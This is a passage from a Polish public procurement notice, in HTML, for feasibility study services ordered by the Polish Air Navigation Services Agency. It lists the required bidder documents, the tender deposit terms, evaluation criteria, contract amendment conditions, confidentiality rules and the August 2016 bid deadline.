a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2.2.   Dokumenty, o których mowa w ppkt  2.1.1.  oraz ppkt  2.1.2. lit. b) powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ppkt  4.1.2. lit. a) powyże, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.3.	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 2.1., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis ust. 4.2. stosuje się. 
2.4.	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.	WYKAZ DOKUMENTÓW I OŚWIADCZEŃ na potwierdzenie spełniania warunków udziału w postępowaniu, opisanych w art. 22 ust. 1b ustawy. Wykonawca, którego oferta została oceniona najwyżej, obowiązany jest złożyć niżej wymienione dokumenty:
1.1.	Wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie  z podaniem przedmiotu usługi wartości projektu dla którego usługi te były realizowane, dat wykonania (od-do), podmiotów, na rzecz których usługi zostały wykonane (nazwa, adres i telefon)  1 egzemplarz, datowany i odpowiednio podpisany - opracowany wg druku dołączonego do  specyfikacji - Załącznik nr 4 do SIWZ.
1.1.1.	UWAGA: W związku z określeniem w rozdziale V pkt 2 ppkt 2.2 pppkt  2.2.1. SIWZ zakresu usług koniecznych do wykazania spełniania warunku udziału w postępowaniu w zakresie zdolności zawodowej, Wykonawca obowiązany jest w ww. Wykazie podać również informacje o wykonanych w okresie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej trzech (3) studium  wykonalności każde dla projektu inwestycyjnego o wartości powyżej 25 mln EUR .
2.	Dowody potwierdzające należyte wykonanie usług uwzględnionych w wykazie, o którym mowa w pkt 2 ppkt 2.1 powyżej. Dowodami są:
a)	referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, z tym że w odniesieniu do nadal wykonywanych usług dokumenty te powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b)	inne dokumenty  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dokumentów, o których mowa w lit. a) powyżej.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego zostały wcześniej wykonane usługi wskazane w wykazie, o którym mowa w pkt 1 ppkt 1.1. powyżej, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 2 ppkt 2. powyżej.
3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich, doświadczenia oraz informacją o podstawie do dysponowania tymi osobami - opracowany wg druku dołączonego do  specyfikacji - Załącznik nr 5 do SIWZ;
UWAGA: W związku z określeniem w rozdziale V pkt 2 ppkt 2.2 pppkt  2.2.2. SIWZ min. Wymagań w zakresie osób jakie muszą być skierowane przez Wykonawcę do realizacji zamówienia i wymaganego ich doświadczenia do wykazania spełniania warunku udziału w postępowaniu w zakresie zdolności zawodowej, Wykonawca obowiązany jest w ww. Wykazie podać również informację na temat osób jakie zostaną skierowane przez Wykonawcę do realizacji zamówienia tj.  Kierownika projektu; Zastępcy Kierownika projektu ds. analiz finansowych  oraz Zastępcy Kierownika ds. analiz środowiskowych, wraz z podaniem Imienia i Nazwiska osoby oraz posiadanego doświadczenia.
4.	Kopię polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 400 000 zł (słownie: czterysta tysięcy  złotych), ważną w terminie składania ofert<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.1.	Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 25a ust. 1 ustawy, że wykonawca nie podlega wykluczeniu z udziału w postępowaniu oraz spełnia warunki udziału w postępowaniu  opracowane wg druków dołączonych do SIWZ  Załącznik nr 7 i Załącznik nr 8 SIWZ; 
1.2.	W przypadku Wykonawcy, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w pkt. 1.1.
1.3.	Jeżeli Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniach, o których mowa w pkt. 1.1. 
1.4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
1.5.	Jeżeli Wykonawca, w celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w rozdz. V. pkt 1 ppkt. 1.1. oraz pkt. 2  SIWZ, polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, musi udowodnić  Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów umożliwiającymi należyte wykonanie zamówienia, w szczególności przedstawiając Zamawiającemu zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zamawiający w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga przedstawienia dokumentu potwierdzającego:
1.5.1.	zakres dostępnych Wykonawcy zasobów innego podmiotu,
1.5.2.	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia,
1.5.3.	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,
1.5.4.	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.
Dokument, o którym mowa powyżej, może stanowić pisemne zobowiązanie podmiotu trzeciego udostępniającego niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia, z zastrzeżeniem, że musi wskazywać elementy o których mowa w ppkt 1.5.1.  1.5.4.
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1b ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 22a ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający wymaga od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 3 pkt 3.1.  3.5. poniżej.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający wymaga wniesienia wadium.
2.	Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 9 000 zł (słownie: dziewięć tysięcy  złotych 00/100).
3.	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj. w:
3.1.	pieniądzu;
3.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.3.	gwarancjach bankowych (bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie Zamawiającego);
3.4.	gwarancjach ubezpieczeniowych (bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie Zamawiającego);
3.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
5.	W przypadku wadium wnoszonego w pieniądzu, za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
6.	Wadium w pieniądzu należy wnieść na rachunek Zamawiającego: Bank Gospodarstwa Krajowego, Aleje Jerozolimskie 7, 00-955 Warszawa  rachunek 03 1130 1017 0025 0094 4820 0013.
7.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w budynku Zamawiającego, ul. Gałczyńskiego 2a, 05-090 Raszyn, w kancelarii  pokój 004 lub umieścić w osobnej kopercie  opisanej wadium  postępowanie nr AQW 2227 23/54/2016, dołączonej do oferty. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w pkt 3 powyżej, beneficjentem takich dokumentów musi być Polska Agencja Żeglugi Powietrznej, ul. Wieżowa 8, 02-147 Warszawa, a złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 4a oraz ust. 5 ustawy.
8.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ, spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt. 7b ustawy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto </td><td>55</td></tr><tr><td>doświadczenie wyznaczonego do realizacji zamówienia Kierownika projektu </td><td>15</td></tr><tr><td>doświadczenie wyznaczonego do realizacji zamówienia Zastępcy Kierownika projektu ds. analiz finansowych</td><td>15</td></tr><tr><td>doświadczenie wyznaczonego do realizacji zamówienia Zastępcy Kierownika projektu ds. analiz środowiskowych</td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania istotnej zmiany postanowień przyszłej umowy w stosunku do treści oferty, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności, gdy:
1.	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu Umowy (w tym nastąpi zmiana stawki podatku od towarów i usług).
a.) Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w ust.1 pkt 1.1. powyżej.
b.) W wypadku zmiany, o której mowa w ust.1 pkt 1.1. powyżej wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
2.	wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony o ile nie ulegnie zmianie ogólny charakter Umowy do charakteru Umowy w pierwotnym brzmieniu, zmiana nie wprowadza warunków, które gdyby były przyjęte w postępowaniu powodowałaby możliwość ubiegania się o zamówienie innych podmiotów  lub też przyjęto by ofertę innej treści, nie narusza równowagi ekonomicznej Umowy na korzyść Wykonawcy, nie rozszerza i nie zmniejsza zakresu świadczenia i zobowiązania wynikającego z Umowy i nie polega na zastąpieniu Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym wykonawcą, poza przypadkami o których mowa w art. 144 ust. 1 pkt 4. Ustawy;
3.	 zaistnieją zdarzenia o charakterze siły wyższej, niezależne od Stron Umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań. W takim przypadku Strony ustalą zasadność i możliwość wydłużenia terminu realizacji Umowy o czas faktycznego wstrzymania realizacji ze względu na zaistnienie zdarzeń o charakterze siły wyższej.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />1.	Strony Umowy zobowiązują się do nie ujawniania osobom trzecim informacji poufnych i/lub stanowiących tajemnicę przedsiębiorstwa, uzyskanych w związku z realizacją zadań objętych Umową, chyba, że uzyskają pisemną zgodę drugiej Strony w każdym konkretnym przypadku.
2.	Ujawnienie informacji poufnych i/lub stanowiących tajemnicę przedsiębiorstwa wymagane zgodnie z obowiązującym prawem, orzeczeniem sądowym lub decyzją administracyjną uprawnionego organu administracji państwowej nie podlega powyższym ograniczeniom.
3.	Zobowiązanie do poufności, o którym mowa w niniejszym paragrafie, trwa nadal pomimo rozwiązania lub wygaśnięcia Umowy. Strony odpowiadają za zachowanie poufności przez swoich pracowników, pełnomocników oraz za osoby działające w ich imieniu.
<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />22.	Informacje zawarte w ofercie, stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2003 r. Nr 153 poz. 1503 z późn.zm.), co do których Wykonawca:
22.1.	zastrzegł, nie później niż w terminie składania ofert, że nie mogą być udostępnione, muszą być oznaczone klauzulą: NIE UDOSTĘPNIAĆ  INFORMACJE STANOWIĄ TAJEMNICĘ PRZEDSIĘBIORSTWA W ROZUMIENIU ART. 11 UST. 4 USTAWY OZWALCZANIU NIEUCZCIWEJ KONKURENCJI i powinny być odrębną częścią nie złączoną z ofertą w sposób trwały.
22.2.	wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa  Wykonawca zobowiązany jest złożyć wraz z ofertą uzasadnienie zwierające w szczególności: określenie charakteru jaki mają zastrzeżone informacje, wskazanie działań jakie zostały podjęte przez Wykonawcę w celu zachowania poufności informacji zawartych w dokumentach oraz wskazanie czy informacje stanowiące tajemnicę przedsiębiorstwa zostały wcześniej ujawnione do wiadomości publicznej.
Jednocześnie Zamawiający wskazuje, iż zgodnie z art. 8 ust. 3 ustawy, Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.
<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 31/08/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />
I. WARUNKI UDZIAŁU W POSTĘPOWANIU  ORAZ PODSTAWY WYKLUCZENIA WYKONAWCY Z POSTĘPOWANIA O ZAMÓWIENIE 
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zgodnie z art. 22 ustawy:
1.1.	spełniają warunki udziału w postępowaniu dotyczące:
1.1.1.	 kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów;
1.1.2.	 sytuacji ekonomicznej lub finansowej;
1.1.3.	 zdolności technicznej lub zawodowej
1.2.	nie podlegają wykluczeniu
2.	określenie warunków udziału w postępowaniu:
2.1.	Warunek nr 1  dotyczący sytuacji ekonomicznej i finansowej Wykonawcy.
Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na podstawie przedstawienia w ofercie polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 400 000,00 PLN (słownie: czterysta tysięcy zł);
UWAGA: W przypadku podania wartości polisy w walucie innej niż zł, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na zł według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. 
2.2.	Warunek nr 2 - dotyczący zdolności technicznej lub zawodowej Wykonawcy:
2.2.1.	Wykonawca musi wykazać, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonywał co najmniej  trzy (3) studia wykonalności każde dla projektu inwestycyjnego o wartości powyżej 25 mln EUR;
UWAGA: W przypadku podania wartości projektu inwestycyjnego dla którego usługa była realizowana  w walucie innej niż EUR, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na EUR według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.
2.2.2.	Wykonawca musi wykazać, iż osoby skierowane przez Wykonawcę do realizacji zamówienia i pełnienia określonych funkcji posiadają odpowiednie doświadczenie tj.:
2.2.2.1.	 Osoba skierowana przez Wykonawcę do realizacji zamówienia jako Kierownik projektu posiada  doświadczenie w kierowaniu wykonaniem minimum trzech studiów wykonalności dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR tj. kierowała wykonaniem w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania min. trzech (3) studiów wykonalności dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR
2.2.2.2.	Osoba skierowana przez Wykonawcę do realizacji zamówienia jako Zastępca Kierownika projektu ds. analiz finansowych posiada doświadczenie w wykonaniu co najmniej trzech (3) analiz finansowych dużych projektów, z zastosowaniem metodologii wymaganej przez KE w zakresie analizy kosztów i korzyści oraz analizy finansowej tj. w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania była autorem lub współautorem co najmniej trzech (3) analiz finansowych dużych projektów, z zastosowaniem metodologii wymaganej przez KE w zakresie analizy kosztów i korzyści oraz analizy finansowej;
2.2.2.3.	Osoba skierowana przez Wykonawcę do realizacji zamówienia jako Zastępcę Kierownika ds. analiz środowiskowych posiada doświadczenie w wykonaniu co najmniej trzech (3) opracowań każde dla projektów przekraczających 25 mln EUR: raportów oddziaływania na środowisko sporządzonych w ramach ocen oddziaływania przedsięwzięcia na środowisko lub prognoz oddziaływania na środowisko sporządzonych w ramach strategicznych ocen oddziaływania na środowisko tj. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania była autorem lub współautorem co najmniej trzech (3) opracowań, każde dla projektów przekraczających 25 mln EUR: raportów oddziaływania na środowisko sporządzonych w ramach ocen oddziaływania przedsięwzięcia na środowisko lub prognoz oddziaływania na środowisko sporządzonych w ramach strategicznych ocen oddziaływania na środowisko; 
                                    
3.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art. 24 ust. 1 ustawy (pkt. 1.2. powyżej).
4.	Zamawiający, na podstawie art. 24 ust. 5 ustawy, wykluczy z postępowania o zamówienie Wykonawcę:
